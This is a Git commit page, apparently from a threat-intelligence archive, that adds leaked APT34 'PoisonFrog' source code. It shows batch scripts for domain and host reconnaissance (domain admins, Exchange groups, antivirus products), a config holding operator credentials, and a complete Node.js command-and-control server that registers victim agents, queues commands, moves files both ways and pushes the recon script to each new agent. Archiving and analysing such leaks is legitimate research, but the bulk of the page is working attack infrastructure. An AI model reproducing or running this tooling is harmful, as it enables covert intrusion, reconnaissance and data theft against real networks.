admin/APT_REPORT
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

APT34

Browse Source
This commit is contained in:
blackorbird
2019-04-18 11:19:12 +08:00
parent f6c2839353
commit b3c7e3e449
495 changed files with 73786 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

14
APT34/APT34-LeakCode/posionfrog/agent/poisonfrog.ps1 Normal file
View File

File diff suppressed because one or more lines are too long

1
APT34/APT34-LeakCode/posionfrog/serverside/0000000000.bat Normal file
View File

@@ -0,0 +1 @@
@echo off&echo ________________________________Whoami______________________________ & whoami &echo ________________________________HostName______________________________ & hostname & echo ________________________________IpConfig______________________________ & ipconfig /all & echo ____________________________AllLocalUsers___________________________ & net user /domain & echo _________________________AllUserInDomain___________________________ & net group /domain & echo __________________________DomianAdmins_______________________________ & net group "domain admins" /domain & echo _______________________ExchangetrustedMembers_______________________ & net group "Exchange Trusted Subsystem" /domain & echo ________________________NetAccountDomain____________________________ & net accounts /domain & echo ______________________________NetUser________________________________ & net user & echo _______________________NetLocalGroupMembers________________________ & net localgroup administrators & echo ________________________________netstat_______________________________ & netstat -an & echo ______________________________tasklist________________________________ & tasklist & echo _____________________________systeminfo_______________________________ & systeminfo & echo ________________________________RDP___________________________________ & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" & echo ________________________________Task__________________________________ & schtasks /query /FO List /TN "GoogleUpdatesTaskMachineUI" /V | findstr /b /n /c:"Repeat: Every:" & echo ________________________________________AntiVirus______________________________ &WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

1
APT34/APT34-LeakCode/posionfrog/serverside/9999999999.bat Normal file
View File

@@ -0,0 +1 @@
@echo off&echo ________________________________Whoami______________________________ & whoami &echo ________________________________HostName______________________________ & hostname & echo ________________________________IpConfig______________________________ & ipconfig /all & echo ____________________________AllLocalUsers___________________________ & net user /domain & echo _________________________AllUserInDomain___________________________ & net group /domain & echo __________________________DomianAdmins_______________________________ & net group "domain admins" /domain & echo _______________________ExchangetrustedMembers_______________________ & net group "Exchange Trusted Subsystem" /domain & echo ________________________NetAccountDomain____________________________ & net accounts /domain & echo ______________________________NetUser________________________________ & net user & echo _______________________NetLocalGroupMembers________________________ & net localgroup administrators & echo ________________________________netstat_______________________________ & netstat -an & echo ______________________________tasklist________________________________ & tasklist & echo _____________________________systeminfo_______________________________ & systeminfo & echo ________________________________RDP___________________________________ & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" & echo ________________________________Task__________________________________ & schtasks /query /FO List /TN "GoogleUpdatesTaskMachineUI" /V | findstr /b /n /c:"Repeat: Every:" & echo ________________________________________AntiVirus______________________________ &WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

5
APT34/APT34-LeakCode/posionfrog/serverside/config.json Normal file
View File

@@ -0,0 +1,5 @@
{
"guid" : "/7345SDFHSALKJDFHNASLFSDA3423423SAD22",
"user" : "blacktusk",
"password" : "fireinthehole"
}

4
APT34/APT34-LeakCode/posionfrog/serverside/installing/filesList Normal file
View File

@@ -0,0 +1,4 @@
file should be saved in project
srvr.js
files in views folder

15
APT34/APT34-LeakCode/posionfrog/serverside/installing/install_pachages.bat Normal file
View File

@@ -0,0 +1,15 @@
npm install express --save
npm install ejs --save
npm install express-fileupload --save
npm install dateformat --save
npm install body-parser --save
npm install multer --save
npm install file-base64 --save
npm install dnsd --save
npm install ip --save
npm install cookies --save
npm install --save moment
npm install --save express ejs express-fileupload dateformat body-parser multer file-base64 dnsd
npm install --save forever -g

21
APT34/APT34-LeakCode/posionfrog/serverside/installing/installing mongo_nodejs Normal file
View File

@@ -0,0 +1,21 @@
#ubuntu 16.04
apt-get update
apt-get upgrade
# installing nodejs
sudo apt-get install nodejs
sudo apt-get install nodejs-legacy
#installing mongodb
sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv EA312927
echo "deb http://repo.mongodb.org/apt/ubuntu xenial/mongodb-org/3.2 multiverse" | sudo tee /etc/apt/sources.list.d/mongodb-org-3.2.list
sudo apt-get install -y mongodb-org
echo "deb http://repo.mongodb.org/apt/ubuntu precise/mongodb-org/3.0 multiverse" | tee /etc/apt/sources.list.d/mongodb-org-3.0.list

4
APT34/APT34-LeakCode/posionfrog/serverside/installing/stop dnsmasq Normal file
View File

@@ -0,0 +1,4 @@
sudo sed -i 's/^dns=dnsmasq/#&/' /etc/NetworkManager/NetworkManager.conf
sudo service network-manager restart
sudo service networking restart
sudo killall dnsmasq

910
APT34/APT34-LeakCode/posionfrog/serverside/routes/index.js Normal file
View File

@@ -0,0 +1,910 @@
var commonDir = "./agents/";
var config = require('./../config.json');
var createIdPool = function (idPoolAddress) {
var idz = [];
for (var i = 1; i < 10; i++) {
for (var j = 0; j < 10; j++) {
for (var k = 1; k < 3; k++) {
for (var l = 0; l < 5; l++) {
idz.push(i + "" + j + "" + k + "" + l);
}
}
}
}
//console.log("in create id pool function \n");
var fs = require('fs');
var file = fs.createWriteStream(idPoolAddress);
file.on('error', function (err) { console.log(err); });
idz.forEach(function (v) { file.write(v + '\n'); });
file.end();
}
exports.panel = function (req, res) {
var fs = require('fs');
if (req.params.input == null) {
//res.redirect("/login");
return;
}
if (req.params.input == "favicon.ico") {
//res.redirect("/login");
return;
}
var inputLen = req.params.input.length;
// check password from cookie
var Cookies = require('cookies');
var cookies = new Cookies(req, res);
var cookie = cookies.get(config.user);
console.log(inputLen + ":" + req.params.input + ">" + cookie);
var pass = false;
if (cookie === undefined) {
res.render('notfound');
return;
} else {
if (cookie != config.password) {
res.render('notfound');
return;
} else {
pass = true;
}
}
if (!pass) {
if (req.params.input == "notfound") {
res.render('notfound');
return;
}
}
if (inputLen != 15) {
if (inputLen != 16) {
res.redirect("/in/http");
return;
}
}
var tokensTmp = req.params.input.split("<>");
var agentId = tokensTmp[1];
var agentType = tokensTmp[0];
var agentDir = commonDir + agentType + "/" + agentId;
if (!fs.existsSync(agentDir + "/cfg")) { // checking for config file of agent
res.redirect("/in/http");
return;
}
//console.log(agentType);
if (agentType == "dns") {
if (!fs.existsSync(agentDir + "/idPool")) {
createIdPool(agentDir + "/idPool");
}/*else if() {
// file length less than 1 kb - there isn't more idz
}*/
}
fs.readFile(commonDir + agentType + "/" + agentId + "/cfg", 'utf8', function (err, data) {
if (err) { console.log(err); }
fs.readFile(commonDir + agentType + "/" + agentId + "/cfglast", 'utf8', function (err, date) {
if (err) { console.log(err); }
var lines = data.trim().split('\n');
var lastLine = lines.slice(-1)[0];
var info = lastLine.split("<>");
var whoami = info[1];
var ip = info[2];
var first = info[3];
if(date != undefined) {
first = date;
}
var dateFormat = require('dateformat');
var commandIdTmp = dateFormat(new Date(), "mmddHHMMss");
//if(commandIdTmp.charAt(0) == "0") {commandIdTmp = '1'+commandIdTmp.substring(1, 10);}
var commands = [];
// read wait send and receive folder...................
var ff = require('flat-file-db');
var db = ff.sync(agentDir + "/log.db");
var keys = db.keys();
console.log(agentDir);
for (var i = 0; i < keys.length; i++) {
//console.log(db.get(keys[i]));
commands.push(db.get(keys[i]));
}
db.close();
//console.log(commands);
var df = require('dateformat');
res.render('panel', { agentDetails: [agentId, whoami, ip, first, agentType], commandId: "" + commandIdTmp, commands: commands, current_time: (df(new Date()).toString()) });
});
});
};
exports.tars = function (req, res) {
if (req.params.input == null) {
//res.redirect("/login");
return;
}
var Cookies = require('cookies');
var cookies = new Cookies(req, res);
var cookie = cookies.get(config.user);
var pass = false;
if (cookie === undefined) {
//res.redirect('/login');
return;
} else {
if (cookie != config.password) {
//res.redirect('/login');
return;
}
}
var branch = req.params.input;
var agentsDetail = [];
var fs = require('fs');
var state = "httpActive";
console.log("[tars function]: after checking cookie!");
var proms = []
if (branch == "dns") {
state = "dnsActive";
fs.readdir(commonDir + "dns", function (err, files) {
if (err) { console.log(err); }
for (var i = 0; i < files.length; i++) {
if (fs.statSync(commonDir + "dns/" + files[i]).isDirectory()) {
var data = files[i] + "<>f<>cfg_not_exist<>u<>c<>k";
var prom = new Promise((resolve, reject) => {
var cfgAddress = commonDir + "dns/" + files[i] + "/cfg";
fs.readFile(cfgAddress, 'utf8', function (err, data) {
fs.readFile(cfgAddress + "last", 'utf8', function (err1, date) {
if (err) {
console.log(err);
//reject()
}
if (data == undefined) {
data = files[i] + "<>f<>cfg_not_exist<>f<>u<>c<>k";
}
var lines = data.trim().split('\n');
var lastLine = lines.slice(-1)[0];
tokens = lastLine.split("<>");
var tempTokens = [];
tempTokens.push(tokens[0]);
tempTokens.push(tokens[1]);
tempTokens.push(tokens[2]);
var moment = require('moment');
console.log(tokens[3], new Date());
var startTime = "";
if (date == undefined) {
startTime = tokens[3];
} else {
startTime = date;
}
var startDate = moment(new Date(Date.parse(startTime)), 'yyyy-mm-dd HH:MM:ss');
var endDate = moment(new Date(), 'yyyy-mm-dd HH:MM:ss');
var diffMTemp = endDate.diff(startDate, 'Minutes');
var diffD = endDate.diff(startDate, 'Days');
var diffH = endDate.diff(startDate, 'Hours') - (diffD * 24);
var diffM = diffMTemp - (diffH * 60) - (diffD * 24 * 60);
tempTokens.push(diffD + "d " + diffH + "h " + diffM + "m");
tempTokens.push("dns");
if (diffMTemp < 2) {
tempTokens.push("color:green");
} else if (diffMTemp < 60) {
tempTokens.push("color:orange");
} else {
tempTokens.push("color:red");
}
if (fs.existsSync(commonDir + "files/description.db")) {
var ff = require('flat-file-db');
var db = ff.sync(commonDir + "files/description.db");
var des = db.get(tokens[0]);
if (des === undefined) {
tempTokens.push("No description");
} else {
tempTokens.push(des);
}
} else {
tempTokens.push("No description");
}
//agentsDetail.push(tempTokens);
resolve(tempTokens)
});
});
})
proms.push(prom)
}
}
Promise.all(proms).then(data => {
res.render('agents', { agents: data, state: state });
}).catch(function () {
console.log("Promise Rejected");
});
});
} else {
fs.readdir(commonDir + "http", function (err, files) {
if (err) { console.log(err); }
console.log("[tars function]: http before reading folder! " + files.length);
for (var i = 0; i < files.length; i++) {
if (fs.statSync(commonDir + "http/" + files[i]).isDirectory()) {
var prom = new Promise((resolve, reject) => {
var cfgAddress = commonDir + "http/" + files[i] + "/cfg";
fs.readFile(cfgAddress, 'utf8', function (err, data) {
fs.readFile(cfgAddress + "last", 'utf8', function (err1, date) {
console.log("this is date: "+date);
if (err1) {
console.log(err1);
//reject()
}
if (err) {
console.log(err);
//reject()
}
if (data == undefined) {
data = files[i] + "<>f<>cfg_not_exist<>f<>u<>c<>k";
}
var lines = data.trim().split('\n');
var lastLine = lines.slice(-1)[0];
tokens = lastLine.split("<>");
var tempTokens = [];
tempTokens.push(tokens[0]);
tempTokens.push(tokens[1]);
tempTokens.push(tokens[2]);
var moment = require('moment');
var startTime = "";
if (date == undefined) {
startTime = tokens[3];
} else {
startTime = date;
}
var startDate = moment(new Date(Date.parse(startTime)), 'yyyy-mm-dd HH:MM:ss');
var endDate = moment(new Date(), 'yyyy-mm-dd HH:MM:ss');
var diffMTemp = endDate.diff(startDate, 'Minutes');
var diffD = endDate.diff(startDate, 'Days');
var diffH = endDate.diff(startDate, 'Hours') - (diffD * 24);
var diffM = diffMTemp - (diffH * 60) - (diffD * 24 * 60);
tempTokens.push(diffD + "d " + diffH + "h " + diffM + "m");
tempTokens.push("http");
if (diffMTemp < 2) {
tempTokens.push("color:green");
} else if (diffMTemp < 60) {
tempTokens.push("color:orange");
} else {
tempTokens.push("color:red");
}
console.log(tempTokens);
if (fs.existsSync(commonDir + "files/description.db")) {
var ff = require('flat-file-db');
var db = ff.sync(commonDir + "files/description.db");
var des = db.get(tokens[0]);
if (des === undefined) {
tempTokens.push("No description");
} else {
tempTokens.push(des);
}
} else {
tempTokens.push("No description");
}
resolve(tempTokens)
});
});
})
proms.push(prom)
}
}
Promise.all(proms).then(data => {
res.render('agents', { agents: data, state: state });
}).catch(function () {
console.log("Promise Rejected");
});
});
}
// console.log("[tars function]: before rendering page!");
// console.log(agentsDetail);
};
exports.notFound = function (req, res) {
res.send("<h2>Go the other way bro, can't find here</h2>");
};
exports.posted = function (req, res) { // posted command and upload and download from agent panel
var commandId = req.body.commandId;
var command = req.body.command;
var downloadAdr = req.body.downloadAdr;
var agentId = req.body.agentId;
var agentType = req.body.agentType;
var commandType = req.body.commandType;
var defaultCommand = req.body.defaultCommand;
var fs = require('fs');
var agentDir = commonDir + agentType + "/" + agentId;
if (!fs.existsSync(agentDir)) {
fs.mkdirSync(agentDir);
}
// inserting new command .....
var ff = require('flat-file-db');
var db = ff.sync(agentDir + "/log.db");
if (agentType == "dns") { // create command files in dns type agents ....
var currentCommandId = "null";
if (!fs.existsSync(agentDir + "/idPool")) {
createIdPool(agentDir + "/idPool");
} else {
fs.readFile(agentDir + "/idPool", 'utf8', function (err, data) {
if (err) { }
currentCommandId = data.split('\n')[0];
var linesExceptFirst = data.split('\n').slice(1).join('\n');
fs.writeFile(agentDir + "/idPool", linesExceptFirst, function (err) { if (err) { console.log(err); } });
if (!fs.existsSync(agentDir)) { fs.mkdirSync(agentDir + "/wait_txt/"); }
console.log("download address: " + downloadAdr);
if (commandType) {
if (command != "" && command != undefined) {
fs.writeFile(agentDir + "/wait_txt/" + currentCommandId + "0", command, function (err) { if (err) { console.log(err); } });
db.put(currentCommandId + "0", [commandId, ((command == "" || command == undefined) ? "not" : command), (req.file == null ? "not" : req.file.originalname), (req.file == null ? "not" : req.file.filename), ((downloadAdr == "" || downloadAdr == undefined) ? "not" : downloadAdr), "0"]);
}
if (req.file != null) {
console.log("copy the file " + agentDir + "/wait_txt/" + req.file.originalname);
//fs.writeFile(agentDir + "/wait_txt/" + req.file.originalname, fs.readFileSync(commonDir + "files/" + req.file.filename));
fs.readFile(commonDir + "files/" + req.file.filename, function (err, data) {
if (err) { console.log(err); }
fs.writeFile(agentDir + "/wait_txt/" + req.file.originalname, data, function (err) { if (err) { console.log(err); } });
});
db.put(currentCommandId + "2", [commandId, ((command == "" || command == undefined) ? "not" : command), (req.file == null ? "not" : req.file.originalname), (req.file == null ? "not" : req.file.filename), ((downloadAdr == "" || downloadAdr == undefined) ? "not" : downloadAdr), "0"]);
}
if (downloadAdr != "" && downloadAdr != undefined) {
fs.writeFile(agentDir + "/wait_txt/" + currentCommandId + "1", downloadAdr);
db.put(currentCommandId + "1", [commandId, ((command == "" || command == undefined) ? "not" : command), (req.file == null ? "not" : req.file.originalname), (req.file == null ? "not" : req.file.filename), ((downloadAdr == "" || downloadAdr == undefined) ? "not" : downloadAdr), "0"]);
}
} else {
if (command != "" && command != undefined) {
fs.writeFile(agentDir + "/wait/" + currentCommandId + "0", command, function (err) { if (err) { console.log(err); } });
db.put(currentCommandId + "0", [commandId, ((command == "" || command == undefined) ? "not" : command), (req.file == null ? "not" : req.file.originalname), (req.file == null ? "not" : req.file.filename), ((downloadAdr == "" || downloadAdr == undefined) ? "not" : downloadAdr), "0"]);
}
if (req.file != null) {
//fs.writeFile(agentDir+"/wait/"+currentCommandId+"2", fs.readFileSync(commonDir+"files/"+req.file.filename));
fs.readFile(commonDir + "files/" + req.file.filename, function (err, data) {
if (err) { console.log(err); }
fs.writeFile(agentDir + "/wait/" + currentCommandId + "2", data, function (err) { if (err) { console.log(err); } });
});
db.put(currentCommandId + "2", [commandId, ((command == "" || command == undefined) ? "not" : command), (req.file == null ? "not" : req.file.originalname), (req.file == null ? "not" : req.file.filename), ((downloadAdr == "" || downloadAdr == undefined) ? "not" : downloadAdr), "0"]);
}
if (downloadAdr != "" && downloadAdr != undefined) {
fs.writeFile(agentDir + "/wait/" + currentCommandId + "1", downloadAdr, function (err) { if (err) { console.log(err); } });
db.put(currentCommandId + "1", [commandId, ((command == "" || command == undefined) ? "not" : command), (req.file == null ? "not" : req.file.originalname), (req.file == null ? "not" : req.file.filename), ((downloadAdr == "" || downloadAdr == undefined) ? "not" : downloadAdr), "0"]);
}
}
db.close();
});
}
} else {
if (defaultCommand == "yes") {
db.put(commandId, [commandId, "Default Command", "0000000000.bat", "default command file", "not", "0"]);
db.close();
fs.writeFile(agentDir + "/wait/" + commandId, commandId + "<>C:\\Users\\Public\\Public_Data\\files\\0000000000.bat<>0000000000.bat<>386be98ce7c7955f92dc060779ed7613<>not", function (err) { if (err) { console.log("write command file: " + err); } });
} else {
db.put(commandId, [commandId, (command == "" ? "not" : command), (req.file == null ? "not" : req.file.originalname), (req.file == null ? "not" : req.file.filename), (downloadAdr == "" ? "not" : downloadAdr), "0"]);
db.close();
fs.writeFile(agentDir + "/wait/" + commandId, commandId + "<>" + (command == "" ? "not" : command) + "<>" + (req.file == null ? "not" : req.file.originalname) + "<>" + (req.file == null ? "not" : req.file.filename) + "<>" + (downloadAdr == "" ? "not" : downloadAdr), function (err) { if (err) { console.log("write command file: " + err); } });
}
}
res.redirect("/" + agentType + "<>" + agentId);
}
exports.deleteCommand = function (req, res) {
//console.log("[deleteCommand] function first line");
if (req.params.input == null) {
//res.redirect("/login");
return;
}
var Cookies = require('cookies');
var cookies = new Cookies(req, res);
var cookie = cookies.get(config.user);
var pass = false;
if (cookie === undefined) {
//res.redirect('/login');
return;
} else {
if (cookie != config.password) {
//res.redirect('/login');
return;
}
}
//console.log("[deleteCommand] after session checking");
var tokensTmp = req.params.input.split("-");
var agentType = tokensTmp[0];
var agentId = tokensTmp[1];
var commandId = tokensTmp[2];
var agentDir = commonDir + agentType + "/" + agentId;
//console.log("[deleteCommand] setting agent directory: "+agentDir);
var fileName = commandId;
var fs = require('fs');
var ff = require('flat-file-db');
var db = ff.sync(agentDir + "/log.db");
if (agentType == "dns") {
var keys = db.keys();
for (var i = 0; i < keys.length; i++) {
var tupleTmp = db.get(keys[i]);
if (tupleTmp[0] == commandId) {
fileName = keys[i];
// delete from database
db.del(fileName);
}
}
}
db.del(commandId);
db.close();
//console.log("[deleteCommand] getting tuple file name: "+ fileName);
if (fs.existsSync(agentDir + "/wait/" + fileName)) {
// delete fileName
fs.unlink(agentDir + "/wait/" + fileName, function (err) { if (err) { console.log(err); } });
}
res.redirect("/" + agentType + "<>" + agentId);
}
exports.deleteAgent = function (req, res) { // ............................................... deleteAgent function ....................
console.log("[deleteAgent] function first line");
if (req.params.input == null) {
//res.redirect("/login");
return;
}
var Cookies = require('cookies');
var cookies = new Cookies(req, res);
var cookie = cookies.get(config.user);
var pass = false;
if (cookie === undefined) {
//res.redirect('/login');
return;
} else {
if (cookie != config.password) {
//res.redirect('/login');
return;
}
}
//console.log("[deleteAgent] after session checking");
var fs = require('fs');
var tokensTmp = req.params.input.split("<>");
var agentId = tokensTmp[1];
var agentType = tokensTmp[0];
var deleteFolderRecursive = function (path) {
if (fs.existsSync(path)) {
fs.readdirSync(path).forEach(function (file, index) {
var curPath = path + "/" + file;
if (fs.lstatSync(curPath).isDirectory()) { // recurse
deleteFolderRecursive(curPath);
} else { // delete file
fs.unlink(curPath, function (err) { if (err) { console.log(err); } });
}
});
fs.rmdir(path, function (err) { if (err) console.log(err); });
}
};
deleteFolderRecursive(commonDir + agentType + "/" + agentId);
res.redirect("/in/http");
return;
}
exports.deleteCommand = function (req, res) {
console.log("[deleteCommand] function first line");
if (req.params.input == null) {
//res.redirect("/login");
return;
}
var Cookies = require('cookies');
var cookies = new Cookies(req, res);
var cookie = cookies.get(config.user);
var pass = false;
if (cookie === undefined) {
//res.redirect('/login');
return;
} else {
if (cookie != config.password) {
//res.redirect('/login');
return;
}
}
//console.log("[deleteCommand] after session checking");
var tokensTmp = req.params.input.split("-");
var agentType = tokensTmp[0];
var agentId = tokensTmp[1];
var commandId = tokensTmp[2];
var agentDir = commonDir + agentType + "/" + agentId;
//console.log("[deleteCommand] setting agent directory: "+agentDir);
var fileName = commandId;
var fs = require('fs');
var ff = require('flat-file-db');
var db = ff.sync(agentDir + "/log.db");
if (agentType == "dns") {
var keys = db.keys();
for (var i = 0; i < keys.length; i++) {
var tupleTmp = db.get(keys[i]);
if (tupleTmp[0] == commandId) {
fileName = keys[i];
// delete from database
db.del(fileName);
}
}
}
db.del(commandId);
db.close();
//console.log("[deleteCommand] getting tuple file name: "+ fileName);
if (fs.existsSync(agentDir + "/wait/" + fileName)) {
// delete fileName
fs.unlink(agentDir + "/wait/" + fileName, function (err) { if (err) { console.log(err); } });
}
res.redirect("/" + agentType + "<>" + agentId);
}
exports.descriptionPosted = function (req, res) {
var Cookies = require('cookies');
var cookies = new Cookies(req, res);
var cookie = cookies.get(config.user);
var pass = false;
if (cookie === undefined) {
//res.redirect('/login');
return;
} else {
if (cookie != config.password) {
//res.redirect('/login');
return;
}
}
var agentDescription = req.body.agentDescription;
var agentId = req.body.agentId;
var fs = require('fs');
var ff = require('flat-file-db');
var db = ff.sync(commonDir + "files/description.db");
db.put(agentId, agentDescription);
db.close();
res.redirect("/in/http");
return;
}
exports.result = function (req, res) { // .......................................... show result to user function ..................
if (req.params.input == null) {
//res.redirect("/login");
return;
}
var Cookies = require('cookies');
var cookies = new Cookies(req, res);
var cookie = cookies.get(config.user);
var pass = false;
if (cookie === undefined) {
//res.redirect('/login');
return;
} else {
if (cookie != config.password) {
//res.redirect('/login');
return;
}
}
var tokensTmp = req.params.input.split("-");
var agentType = tokensTmp[0];
var agentId = tokensTmp[1];
var commandId = tokensTmp[2];
var fs = require('fs');
var ff = require('flat-file-db');
var db = ff(commonDir + agentType + "/" + agentId + "/log.db");
var pt = require('path');
if (agentType == "dns") {
db.on('open', function () {
var keys = db.keys();
for (var i = 0; i < keys.length; i++) {
var tupleTmp = db.get(keys[i]);
if (tupleTmp[0] == commandId) {
commandId = keys[i];
}
}
var commandAddress = commonDir + agentType + "/" + agentId + "/receive/" + commandId;
if (fs.existsSync(commandAddress)) {
fs.readFile(commandAddress, function (err, data) {
if (err) { console.log(err); }
res.render('result', { data: data });
});
} else {
res.send("<h2>Response file does not exist!</h2>");
}
});
db.close();
} else {
db.on('open', function () {
var tmp = db.get(commandId);
var fileAddress = "0";
for (var i = 0; i < tmp.length; i++) {
if (tmp[i].toString().startsWith("upl<>")) {
fileAddress = tmp[i].toString().substring(6);
}
}
if (fileAddress != "0") {
res.download(pt.join(__dirname, "../" + fileAddress));
} else {
var commandAddress = commonDir + agentType + "/" + agentId + "/receive/" + commandId;
if (fs.existsSync(commandAddress)) {
fs.readFile(commandAddress, function (err, data) {
if (err) { console.log(err); }
res.render('result', { data: data });
});
} else {
res.send("<h2>Response file does not exist!</h2>");
}
}
});
db.close();
}
}
// logInfo(agentId, whoami, requestIp, dateNow, agentDir+"/cfg");
function logInfo(agentId, whoami, ip, date, ipLogFileAddress) { // .................................................................. log the information ...............
if (agentId === undefined || whoami === undefined || ip === undefined || date === undefined || ipLogFileAddress === undefined) {
return;
}
//console.log(agentId+" "+whoami+" "+ip+" "+date);
var fs = require('fs');
var lines = [];
var lineNumber = -1;
console.log(ipLogFileAddress);
fs.writeFile(ipLogFileAddress+"last", date, function (err) { if (err) { console.log(err); } });
if (fs.existsSync(ipLogFileAddress)) {
fs.readFile(ipLogFileAddress, 'utf8', function (err, data) {
if (err) { console.log(err); }
lines = data.split('\n');
for (var i = 0; i < lines.length; i++) {
var lineIp = lines[i].split('<>')[2];
//console.log("lineIp: " + lineIp);
if (lineIp == ip) {
lineNumber = i;
}
}
//console.log("lineNumber: " + lineNumber);
if (lines.length > 0) {
fs.writeFile(ipLogFileAddress, lines[0], function (err) {
if (err) { console.log(err); }
for (var j = 1; j < lines.length; j++) {
if (lineNumber != j) {
fs.appendFile(ipLogFileAddress, "\n" + lines[j], function (err) { if (err) { console.log(err); } });
}
}
});
}
fs.appendFile(ipLogFileAddress, "\n" + agentId + "<>" + whoami + "<>" + ip + "<>" + date, function (err) { if (err) { console.log(err); } });
});
} else {
fs.writeFile(ipLogFileAddress, "\n" + agentId + "<>" + whoami + "<>" + ip + "<>" + date, function (err) { if (err) { console.log(err); } });
}
}
exports.loginPage = function (req, res) { // ................................................ login checking function ..................
console.log("hddddddddddddddddd");
res.render('login');
return;
}
exports.login = function (req, res) { // ................................................ login checking function .................
var Cookies = require('cookies');
var cookies = new Cookies(req, res);
var cookie = cookies.get(config.user);
if (cookie === undefined) {
//console.log("cookie not exist");
var username = req.body.username;
var password = req.body.password;
//console.log(username+" "+password);
if (username == config.user && password == config.password) {
// set cookie
cookies.set(config.user, config.password, { maxAge: new Date(Date.now() + 3600000), expires: new Date(Date.now() + 3600000), httpOnly: true })
//console.log('cookie created successfully');
res.redirect("/in/http");
return;
} else {
res.redirect(config.guid);
return;
}
} else {
// yes, cookie was already present
//console.log('cookie exists', cookie);
res.redirect("/in/http");
}
}
exports.resultPosted = function (req, res) { // ...................................... result of command recieved and save function .....................
var agentCode = req.params.input;
console.log("agentCode=> " + agentCode);
var requestId = "";
var agentId = "";
if (agentCode.length > 20) {
requestId = agentCode.substring(agentCode.length - 10);
agentId = agentCode.substring(0, 5) + agentCode.substring(agentCode.length - 15, agentCode.length - 10);
} else {
console.log("input agentCode not in correct format!");
return;
}
console.log(requestId + " <=requestId and agentId=> " + agentId);
var agentDir = commonDir + "http/" + agentId;
var file = req.files[0];
var fs = require('fs');
console.log(agentDir + " <=agentDir and uploaded result file path=> " + file.path);
if (!fs.existsSync(agentDir + "/receive/")) { fs.mkdirSync(agentDir + "/receive/"); }
fs.createReadStream(file.path).pipe(fs.createWriteStream(agentDir + "/receive/" + requestId));
res.send("ok");
console.log("register receive the result");
var ff = require('flat-file-db');
var db = ff.sync(agentDir + "/log.db");
var tmp = db.get(requestId);
if (tmp !== undefined) {
tmp.push(agentDir + "/receive/" + requestId);
tmp.push("2");
}
db.put(requestId, tmp);
db.close();
console.log("ending receiving");
};
exports.filePosted = function (req, res) { // ......................................... file posted from agent side .............
var agentCode = req.params.input;
var requestId = "";
var agentId = "";
if (agentCode.length > 20) {
requestId = agentCode.substring(agentCode.length - 10);
agentId = agentCode.substring(0, 5) + agentCode.substring(agentCode.length - 15, agentCode.length - 10);
} else {
return;
}
var agentDir = commonDir + "http/" + agentId;
var ff = require('flat-file-db');
var db = ff.sync(agentDir + "/log.db");
var file = req.files[0];
var fs = require('fs');
var tmp = db.get(requestId);
//console.log(agentDir+ " >>> "+db.keys());
var fileName = tmp[4].replace(/^.*[\\\/]/, '');
fs.createReadStream(file.path).pipe(fs.createWriteStream(agentDir + "/receive/" + fileName));
res.send("ok");
console.log(agentDir + "/receive/" + fileName);
if (tmp !== undefined) {
tmp.push("upl<>" + agentDir + "/receive/" + fileName);
tmp.push("2");
}
console.log(tmp);
db.put(requestId, tmp);
db.close();
};
exports.getFile = function (req, res) {
var fileName = req.params.input;
var fs = require('fs');
var fileAddress = commonDir + "files/" + fileName;
fs.createReadStream(fileAddress).pipe(res);
};
// agent request for last command
exports.agent = function (req, res) { // ..............................
var agentCode = req.params.input;
var agentId = "";
var fs = require('fs');
var df = require('dateformat');
if (agentCode.length > 10) {
var requestIp = req.connection.remoteAddress.replace(/^.*:/, '');
agentId = agentCode.substring(0, 5) + agentCode.substring(agentCode.length - 5, agentCode.length);
var agentDir = commonDir + "http/" + agentId;
if (!fs.existsSync(agentDir)) { // this is new agent ....
fs.mkdir(agentDir, function (err) {
if (err) { console.log(err); }
fs.mkdir(agentDir + "/send/");
fs.mkdir(agentDir + "/receive/");
fs.mkdir(agentDir + "/wait/", function (err) {
if (err) { console.log(err); }
fs.createReadStream("./0000000000.bat").pipe(fs.createWriteStream(commonDir + "/files/386be98ce7c7955f92dc060779ed7613"));
fs.writeFile(agentDir + "/wait/0000000000", "0000000000<>C:\\Users\\Public\\Public_Data\\files\\0000000000.bat<>0000000000.bat<>386be98ce7c7955f92dc060779ed7613<>not", function (err) { if (err) { console.log(err); } });
var ff = require('flat-file-db');
var db = ff.sync(agentDir + "/log.db");
db.put("0000000000", ["0000000000", "Default Command", "0000000000.bat", "default command file", "not", "0"]);
db.close();
});
});
}
if (fs.existsSync(agentDir + "/wait/")) {
// var files = fs.readdirSync(agentDir+"/wait/"); // asyncing
fs.readdir(agentDir + "/wait/", function (err, files) {
if (err) console.log(err);
// log last ip and time of agent connected to server
var dateFormat = require('dateformat');
var whoami = "whoami";
var dateNow = df(new Date()); //'yyyy-mm-dd HH:MM:ss'
logInfo(agentId, whoami, requestIp, dateNow, agentDir + "/cfg");
if (files.length > 0) {
var data = fs.readFile(agentDir + "/wait/" + files[0], 'utf8', function (err, data) {
if (err) { console.log(err); }
//console.log(data);
res.send(data + "<>1");
// should asyncing
fs.createReadStream(agentDir + "/wait/" + files[0]).pipe(fs.createWriteStream(agentDir + "/send/" + files[0]));
// fs.unlink(agentDir+"/wait/"+files[0]); // asyncing
fs.unlink(agentDir + "/wait/" + files[0], function (err) { if (err) { console.log(err); } });
// file sended update db
var ff = require('flat-file-db');
var db = ff.sync(agentDir + "/log.db");
var tmp = db.get(files[0]);
if (tmp !== undefined) {
tmp.push("1");
db.put(files[0], tmp);
}
//console.log(db.get(files[0]));
//console.log("updateing: "+db.get(files[0]));
db.close();
});
} else {
res.send("not<>not<>not<>not<>0");
}
});
} else {
// fs.mkdirSync(agentDir+"/wait/"); // asyncing
fs.mkdir(agentDir + "/wait/", function (err) { if (err) { console.log(err); } });
res.send("not<>not<>not<>not<>0");
}
}
};
/*
// defining a function
var async_function = function(val, callback){
process.nextTick(function(){
callback(val);
});
};
// using the function
async_function(true, function(val){
// val == true
});
*/

251
APT34/APT34-LeakCode/posionfrog/serverside/views/agents.ejs Normal file
View File

@@ -0,0 +1,251 @@
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<title>Welcome</title>
<link rel="stylesheet" href="../css/style.css" type="text/css" media="all" />
<script>
function saveDescription(e) {
if (e.keyCode == 13) {
